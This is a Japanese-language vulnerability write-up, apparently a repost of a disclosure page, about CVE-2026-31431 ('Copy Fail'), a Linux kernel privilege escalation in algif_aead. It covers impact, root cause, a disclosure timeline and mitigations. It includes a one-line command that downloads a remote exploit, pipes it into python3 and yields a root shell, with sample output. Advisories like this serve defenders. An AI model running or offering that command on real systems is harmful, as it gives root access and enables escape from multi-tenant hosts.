Copy Fail:クリティカルなLinuxカーネルエクスプロイト CVE-2026-31431

Copy Fail:静かなLinuxカーネルキラー (CVE-2026-31431)

わずか732バイトのPythonスクリプト。4つの主要Linuxディストリビューション。4つのrootシェル — 修正なし、再コンパイルなし、手間なし。Copy Fail(CVE-2026-31431)へようこそ。最近のLinux史上最もポータブルなローカル特権昇格です。

どこでも動作するエクスプロイト

Xint CodeによるAI支援監査で発見されたCopy Failは、algif_aead暗号インターフェースの2017年のカーネル最適化を悪用します。非特権ユーザーは、任意の読み取り可能ファイル — /usr/bin/suのようなsetuid-rootバイナリを含む — のページキャッシュに4バイトの制御データを直接書き込めます。

$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)

1回で成功。100%信頼性。すべてのディストリビューション。

誰がパニックになるべきか(パッチ順序)

優先度 環境 リスク
🟥 多テナントホスト、Kubernetes、CIランナー 任意ユーザー → ホストroot
🟥 クラウドSaaS、ノートブックホスト テナント脱出 → ホスト
🟨 単一テナントサーバー 内部LPEチェーン
🟢 単一ユーザー workstation 事後エクスプロイトのみ

確認済み影響範囲: Ubuntu 24.04、Amazon Linux 2023、RHEL 10、SUSE 16(ほか続報)。

Copy Failの違い

特性 典型的なLPE Copy Fail
競合状態 ✅ 必要 ❌ なし
ディストリビューションごとのオフセット ✅ 必要 ❌ ユニバーサル
信頼性 30-80% ✅ 100%単発
影響範囲 狭い範囲 2017 → 2026 (9年)
コンテナ脱出 ❌ ホスト限定 ✅ クロステナント

Dirty Pipe(パイプフラグ)やDirty Cow(競合状態)とは異なり、Copy FailはAEAD scatterlistの誤処理を悪用する直線コードです。

即時緩和策

1. パッチ(主)

# メインブランチのコミット a664bf3d603d を含むカーネルに更新
apt update && apt upgrade linux-image-generic  # Ubuntu
yum update kernel                            # RHEL
zypper update kernel                        # SUSE

2. 緊急無効化(パッチ前)

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true

パフォーマンス影響: 99.9%のワークロードに影響なし。稀なAF_ALGユーザーのみ。

3. コンテナ強化

信頼できないワークロードでseccompによりAF_ALGソケットをブロック。

技術的詳細

脆弱性はalgif_aead(AF_ALGソケットファミリ)に存在します。2017年の「最適化」で、ページキャッシュページ(読み取り専用ソース)が書き込み可能宛先scatterlistになりました。

  1. splice() がページキャッシュページをcrypto scatterlistに供給
  2. AEAD認証がバッファ境界を超えて4バイトのAAD ESNを書き込み
  3. authenc_esn が上書きされたページキャッシュバイトを復元しない
  4. execve(/usr/bin/su) が破損したページキャッシュを読み取り → rootシェル

ステルスボーナス: VFS書き込みなし、dirtyページなし、ディスク変更なし。キャッシュ排出または再起動 → クリーンなファイル。

公開タイムライン

  • 2026-03-23: カーネルチームに報告
  • 2026-04-01: パッチコミット
  • 2026-04-29: 公開

責任ある防御

PoCは公開(sha256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9)で、防御者がパッチをテスト可能。承認されたシステムでのみ実行。

多テナント運用者: 昨日パッチを適用。この理論ではありません。

Xint Code が見つけた — 実際に機能するAIセキュリティ監査。

オリジナル記事: オリジナルを表示

この記事を共有